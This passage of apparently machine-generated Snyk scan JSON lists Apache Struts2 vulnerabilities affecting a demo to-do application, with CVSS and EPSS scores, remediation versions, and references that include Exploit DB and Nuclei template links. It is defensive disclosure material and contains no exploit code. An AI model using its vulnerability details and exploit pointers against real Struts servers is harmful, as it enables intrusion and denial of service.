"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:51.883631Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (ReDoS) attacks. The REST Plugin is using outdated XStream library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted XML payload.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-051.html)\n", + "epssDetails": { + "percentile": "0.99002", + "probability": "0.93195", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9793" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-08-23T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:51.883631Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Man Yue Mo" + ], + "semver": { + "vulnerable": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.35", + "2.5.17" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ], + "functionId": { + "filePath": "com/opensymphony/xwork2/ActionChainResult.java", + "className": "ActionChainResult", + "functionName": "execute" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/45367", + "title": "Exploit DB" + }, + { + "url": "https://www.exploit-db.com/exploits/45367", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3", + "title": "GitHub Commit" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2018-11776", + "title": "Lgtm Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1620019", + "title": "RedHat Bugzilla Bug" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-057", + "title": "Struts2 Security Bulletin" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:21.641643Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:35.323655Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:21.641643Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution. When the namespace value is not set for a result defined in underlying xml configurations, and in same time, its upper action(s) configurations have no or wildcard namespace, an attacker may be able to conduct a remote code execution attack. They could also use the opportunity when using a url tag which does not have a value and action set and in same time, its upper action(s) configurations have no or wildcard namespace.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.35, 2.5.17 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/45367)\n- [Exploit DB](https://www.exploit-db.com/exploits/45367)\n- [GitHub Commit](https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3)\n- [Lgtm Blog](https://lgtm.com/blog/apache_struts_CVE-2018-11776)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1620019)\n- [Struts2 Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-057)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml)\n", + "epssDetails": { + "percentile": "0.99991", + "probability": "0.97527", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11776" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2018-08-22T00:00:00Z", + "functions_new": [ + { + "version": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ], + "functionId": { + "className": "com.opensymphony.xwork2.ActionChainResult", + "functionName": "execute" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-08-17T00:00:00Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2018-08-22T11:53:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.324260Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.35" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "title": "Regular Expression Denial of Service (ReDoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)", + "[2.5,2.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29", + "2.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.316157Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95900", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4465" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2019-08-23T13:23:19.812650Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:45:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-20T07:45:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.243501Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", + "credit": [ + "Matthew McClain" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.5.31)", + "[6.1.2,6.1.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5.31", + "6.1.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21", + "title": "GitHub Commit" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-063", + "title": "Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:27.696682Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:22.161472Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:27.696682Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper handling of `getProperty()` by the `XWorkListPropertyAccessor` class.\r\nExploiting this vulnerability is possible if the developer has set `CreateIfNull` to true for the underlying Collection type field.\r\n\r\n## Workaround\r\n\r\nSet `CreateIfNull` to false for Collection type fields (it is false by default if not set).\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.31, 6.1.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21)\n- [Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-063)\n", + "epssDetails": { + "percentile": "0.86905", + "probability": "0.01484", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-34149" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-06-14T10:02:40.213361Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-06-14T09:51:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-06-14T10:55:13.206157Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:27.696682Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.31" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", + "credit": [ + "Takeshi Terada of Mitsui Bussan Secure Directions", + "Inc" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.22)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.5.22" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-060", + "title": "Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:16.027732Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:03.532706Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.403682Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:16.027732Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:03.532706Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a file upload is performed to an `Action` that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read-only, such that subsequent upload actions will fail.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-060)\n", + "epssDetails": { + "percentile": "0.95581", + "probability": "0.13147", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-0233" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-08-21T14:39:32.053413Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-08-11T14:36:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-08-21T14:36:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:03.532706Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.22" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "title": "Unrestricted Upload of File with Dangerous Type", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://issues.apache.org/jira/browse/WW-5055", + "title": "Bug Report" + }, + { + "url": "https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:45:53.807283Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:42.248460Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:53.807283Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type. A local code execution issue exists in Apache Struts2 when processing malformed XSLT files, which could let a malicious user upload and execute arbitrary files.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5 or higher.\n## References\n- [Bug Report](https://issues.apache.org/jira/browse/WW-5055)\n- [GitHub Commit](https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd)\n", + "epssDetails": { + "percentile": "0.60025", + "probability": "0.00216", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2012-1592" + ], + "CWE": [ + "CWE-434" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-09-04T15:56:51.451242Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-12-05T15:43:54Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-09-04T15:56:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:45:53.807283Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "title": "Denial of Service", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Matthew McClain" + ], + "semver": { + "vulnerable": [ + "[,2.5.32)", + "[6.0.0,6.1.2.2)", + "[6.2.0,6.3.0.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5.32", + "6.1.2.2", + "6.3.0.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711", + "title": "GitHub Commit" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-065", + "title": "Struts Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:08.762991Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:10.404666Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:27.113057Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:08.762991Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.404666Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service when certain fields exceed the `maxStringLength` limit during multipart requests. An attacker can exploit this to leave uploaded files in the `struts.multipart.saveDir` even after the request has been denied resulting in excessive disk usage.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.32, 6.1.2.2, 6.3.0.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a)\n- [GitHub Commit](https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7)\n- [GitHub Commit](https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-065)\n", + "epssDetails": { + "percentile": "0.66400", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-41835" + ], + "CWE": [ + "CWE-400" + ], + "GHSA": [ + "GHSA-729q-fcgp-r5xh" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-12-06T07:04:16.630936Z", + "functions_new": [], + 